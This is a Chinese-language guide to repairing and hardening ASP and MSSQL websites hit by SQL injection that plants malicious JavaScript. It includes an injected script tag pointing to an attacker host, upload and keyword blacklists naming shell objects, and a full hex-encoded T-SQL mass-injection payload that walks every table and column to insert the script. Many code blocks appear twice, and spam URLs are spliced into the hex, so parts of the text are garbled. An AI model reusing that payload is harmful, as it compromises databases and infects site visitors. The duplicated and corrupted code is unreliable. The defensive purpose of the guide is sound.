MSSQL數據庫被插入JS/sql注入掛馬的解決方法
***先從搜索引擎google、百度等搜索存在漏洞的採用asp+mssql設計的網站,然後採用小明子這樣的注入掃描工具,掃描整個網站,一旦發現有sql注入的漏洞或者上傳漏洞,***就通過各種手段,上傳自己的大馬,如海陽***;然後,***就把這個網站納入他的肉雞列表,隨時在數據庫里加入自己希望加的js代碼,而這些代碼往往是包含着衆多的的病毒、***,最終讓訪問受控網站的用戶的電腦中毒。
雖然,可以通過sql查詢分析器執行批量代換,暫時解決被插入的js代碼問題,然而不從根本上解決整個網站存在的漏洞,包括程序上和服務器安全權限,那麼***還是隨時可以***你的網站數據庫。
在sql查詢分析器裏可以執行以下的代碼批量替換js代碼:
“
update 表名 set 字段名=replace(字段名,’<Script Src=http://c.n%75clear3.com/css/c.js></Script>’,”) ”
update 表名 set 字段名=replace(字段名,’<Script Src=http://c.n%75clear3.com/css/c.js></Script>’,”) ”
flymorn仔細檢查了網站,發現網站存在幾個安全問題:
第一,網站存在上傳漏洞;雖然,上傳文件需要管理員身份驗證,也對上傳文件進行了文件格式的認證,但管理員身份驗證採用了cookies,而cookies是可以被僞造的,而且如果上傳了圖片後,不對該文件的內容採取任何判斷的話,那麼圖片***也很有可能被上傳。
解決措施:1 刪除上傳文件功能(不太實際);2 修改上傳用戶驗證爲session驗證;3 對上傳後的文件內容進行驗證,如果是圖片***,則刪除;可以參考以下的驗證代碼:
”===============判斷上傳文件是否含非法字符串start================
set MyFile = server.CreateObject(”Scripting.FileSystemObject”)
set MyText = MyFile.OpenTextFile(Server.mappath(filePath), 1) ‘讀取文本文件
sTextAll = lcase(MyText.ReadAll)
MyText.close
set MyFile = nothing
sStr=”<%|.getfolder|.createfolder|.deletefolder|.createdirectory|.deletedirectory|.saveas|wscript.shell|script.encode|server.|.createobject|execute|activexobject|language=”
sNoString = split(sStr,”|”)
for i=0 to ubound(sNoString)
if instr(sTextAll,sNoString(i)) then
set filedel = server.CreateObject(”Scripting.FileSystemObject”)
filedel.deletefile Server.mappath(filePath)
set filedel = nothing
Response.Write(”<script>alert(’您上傳的文件有問題,上傳失敗!’);history.back();</script>”)
Response.End
end if
next
”=================判斷上傳文件是否含非法字符串end===================
set MyFile = server.CreateObject(”Scripting.FileSystemObject”)
set MyText = MyFile.OpenTextFile(Server.mappath(filePath), 1) ‘讀取文本文件
sTextAll = lcase(MyText.ReadAll)
MyText.close
set MyFile = nothing
sStr=”<%|.getfolder|.createfolder|.deletefolder|.createdirectory|.deletedirectory|.saveas|wscript.shell|script.encode|server.|.createobject|execute|activexobject|language=”
sNoString = split(sStr,”|”)
for i=0 to ubound(sNoString)
if instr(sTextAll,sNoString(i)) then
set filedel = server.CreateObject(”Scripting.FileSystemObject”)
filedel.deletefile Server.mappath(filePath)
set filedel = nothing
Response.Write(”<script>alert(’您上傳的文件有問題,上傳失敗!’);history.back();</script>”)
Response.End
end if
next
”=================判斷上傳文件是否含非法字符串end===================
第二,網站存在cookies注入漏洞。由於程序設計中,爲了考慮到減小服務器的開銷,所有用戶登陸後採用cookies驗證,這個cookies裏保存了用戶的 ID 和 NAME ,而衆所周知,cookies是經常被***僞造的,這是其一;另外,某些外部參數 沒有采用嚴格的 request.form 和 request.querystring 來獲取內容,爲了簡便,採用了 request(”id”) 這樣的方式。
我們知道,ASP 的request 是先從form、querystring裏獲取內容,如果這兩個爲空,則要從cookies裏獲取內容,大家往往在程序設計中考慮到了 request.form 和 request.querystring 的SQL注入,所以一般都會過濾 request.form 和 request.querystring進行sql注入;但卻偏偏忘了過濾cookies方式下的注入。我們來看下下面這樣的sql語句:
SQL=”select * from 表名 where id=”&request(”id”)
如果這個 id 恰巧是通過cookies來獲取值的,那麼想想,這是一件多麼可怕的事啊!注入者可以輕鬆的僞造一個名爲 id 的虛假 cookies ,因爲這個 id 的cookies 是服務器分配給它的。這個cookies可以被僞造成類似下面這樣的一段代碼:
dEcLaRe @s vArChAr(4000);sEt @s=cAsT(0×6445634c615265204074207641724368417228323535292c406320764172436841722832353529206445634c6
15265207441624c655f637572736f5220635572536f5220466f522073456c456354206 IT人才網([url]http://it.ad0.cn[/url]) 12e6e416d452c622e6e416d
452046724f6d207359734f624a6543745320612c735973436f4c754d6e53206220774865526520612e694www.ad0.cn43d622e6
94420416e4420612e78547950653d27752720416e442028622e78547950653d3939206f5220622e78547950653d3
335206f5220622e78547950653d323331206f5220622e78547950653d31363729206f50654e207441624c655f6375
72736f52206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c4063207768
696c6528404066457443685f7374617475733d302920624567496e20657865632827557044615465205b272b40742
b275d20734574205b272b40632b275d3d727472696d28636f6e7665727428764172436841722c5b272b40632b275
d29292b27273c2f7469746c653e3c736372697074207372633d687474703a2f2f2536622536622533362532652537
352537332f312e6a733e3c2f7363726970743e27272729206645744368206e6578742046724f6d207441624c655f6
37572736f5220694e744f2040742c406320654e6420634c6f5365207441624c655f637572736f52206445416c4c6f4
3615465207441624c655f637572736f520d0a aS vArChAr(4000));exec(@s);–
15265207441624c655f637572736f5220635572536f5220466f522073456c456354206 IT人才網([url]http://it.ad0.cn[/url]) 12e6e416d452c622e6e416d
452046724f6d207359734f624a6543745320612c735973436f4c754d6e53206220774865526520612e694www.ad0.cn43d622e6
94420416e4420612e78547950653d27752720416e442028622e78547950653d3939206f5220622e78547950653d3
335206f5220622e78547950653d323331206f5220622e78547950653d31363729206f50654e207441624c655f6375
72736f52206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c4063207768
696c6528404066457443685f7374617475733d302920624567496e20657865632827557044615465205b272b40742
b275d20734574205b272b40632b275d3d727472696d28636f6e7665727428764172436841722c5b272b40632b275
d29292b27273c2f7469746c653e3c736372697074207372633d687474703a2f2f2536622536622533362532652537
352537332f312e6a733e3c2f7363726970743e27272729206645744368206e6578742046724f6d207441624c655f6
37572736f5220694e744f2040742c406320654e6420634c6f5365207441624c655f637572736f52206445416c4c6f4
3615465207441624c655f637572736f520d0a aS vArChAr(4000));exec(@s);–
看暈了吧。這是利用HEX的方式進行SQL注入,可以繞過一般的IDS驗證,只要系統存在SQL注入,上面的代碼將會被執行,通過遊標遍歷數據庫中的所有表和列並在列中插入js代碼。
解決辦法:1 嚴格過濾 request.form 和 request.querystring 獲取的內容,堅決不用 request(”name”) 這樣的方式獲取值,凡是採用 cookies 保存的內容,儘量不要用在sql語句裏進行查詢數據庫操作;2 重要的用戶資料儘量採用 session 驗證,因爲session是服務器端的,客戶端無法僞造數據,除非他有你服務器的權限。
可以採用以下的防範 get 、post以及cookies 注入的代碼來過濾 sql 注入***:
<%
Response.Buffer = True ‘緩存頁面
‘防範get注入
If Request.QueryString <> “” Then StopInjection(Request.QueryString)
‘防範post注入
If Request.Form <> “” Then StopInjection(Request.Form)
‘防範cookies注入
If Request.Cookies <> “” Then StopInjection(Request.Cookies)
Response.Buffer = True ‘緩存頁面
‘防範get注入
If Request.QueryString <> “” Then StopInjection(Request.QueryString)
‘防範post注入
If Request.Form <> “” Then StopInjection(Request.Form)
‘防範cookies注入
If Request.Cookies <> “” Then StopInjection(Request.Cookies)
‘正則子函數
Function StopInjection(Values)
Dim regEx
Set regEx = New RegExp
regEx.IgnoreCase = True
regEx.Global = True
regEx.Pattern = “‘|;|#|([\s\b+()]+([email=select%7Cupdate%7Cinsert%7Cdelete%7Cdeclare%7C@%7Cexec%7Cdbcc%7Calter%7Cdrop%7Ccreate%7Cbackup%7Cif%7Celse%7Cend%7Cand%7Cor%7Cadd%7Cset%7Copen%7Cclose%7Cuse%7Cbegin%7Cretun%7Cas%7Cgo%7Cexists)[/s/b]select|update|insert|delete|declare|@|exec|dbcc|alter|drop|create|backup|if|else|end|and|or|add|set|open|close|use|begin|retun|as|go|exists)[\s\b[/email]+]*)”
Dim sItem, sValue
For Each sItem In Values
sValue = Values(sItem)
If regEx.Test(sValue) Then
Response.Write “<Script Language=javascript>alert(’非法注入!你的行爲已被記錄!!’);history.back(-1);</Script>”
Response.End
End If
Next
Set regEx = Nothing
End function
%>
Function StopInjection(Values)
Dim regEx
Set regEx = New RegExp
regEx.IgnoreCase = True
regEx.Global = True
regEx.Pattern = “‘|;|#|([\s\b+()]+([email=select%7Cupdate%7Cinsert%7Cdelete%7Cdeclare%7C@%7Cexec%7Cdbcc%7Calter%7Cdrop%7Ccreate%7Cbackup%7Cif%7Celse%7Cend%7Cand%7Cor%7Cadd%7Cset%7Copen%7Cclose%7Cuse%7Cbegin%7Cretun%7Cas%7Cgo%7Cexists)[/s/b]select|update|insert|delete|declare|@|exec|dbcc|alter|drop|create|backup|if|else|end|and|or|add|set|open|close|use|begin|retun|as|go|exists)[\s\b[/email]+]*)”
Dim sItem, sValue
For Each sItem In Values
sValue = Values(sItem)
If regEx.Test(sValue) Then
Response.Write “<Script Language=javascript>alert(’非法注入!你的行爲已被記錄!!’);history.back(-1);</Script>”
Response.End
End If
Next
Set regEx = Nothing
End function
%>
把以上的代碼另存爲一個文件,如 antisql.asp ,然後在數據庫連接文件開頭包含這個文件 <!–#include file=”antisql.asp”–> ,就可以實現全站的防範 sql 注入的***了。
第三,做好服務器權限的分配。對於數據庫的權限,儘量分配最小的權限給用戶使用,如果把sa或管理員的權限分下來,一旦被***淪陷,這將是一個毀滅性的打擊。mssql 的1433端口,建議不用的時候,最好關閉。
總之,安全問題是一個綜合的問題,一個小的細節,可能讓你的幾個月甚至幾年的心血付之東流。我們不僅要從程序上着手每個細節,而且要仔細做好服務器的安全工作,對於虛擬主機的用戶,還要防範服務器上的跨站***。細節決定成敗。